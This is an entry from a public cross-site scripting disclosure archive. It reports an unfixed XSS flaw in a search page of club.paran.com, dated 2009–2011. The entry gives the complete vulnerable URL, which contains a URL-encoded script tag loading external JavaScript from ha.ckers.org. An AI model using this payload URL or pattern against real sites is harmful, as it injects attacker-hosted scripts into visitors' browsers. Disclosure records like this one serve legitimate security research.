Unfixed XSS vulnerability at club.paran.com

ID XSSED:64723
Type xssed
Reporter 1kt0m1
Modified 2011-12-16T00:00:00


Security researcher 1kt0m1, has submitted on 07/10/2009 a cross-site-scripting (XSS) vulnerability affecting club.paran.com, which at the time of submission ranked 4112 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://club.paran.com/main/clubsearch_new.do?p_eye=club^hom^top^clu^searchbtn&query=%3C%3CSCRIPT+src%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2F%3C%3C%2FSCRIPT%3E&searchField=bbs&sort=&order=&page=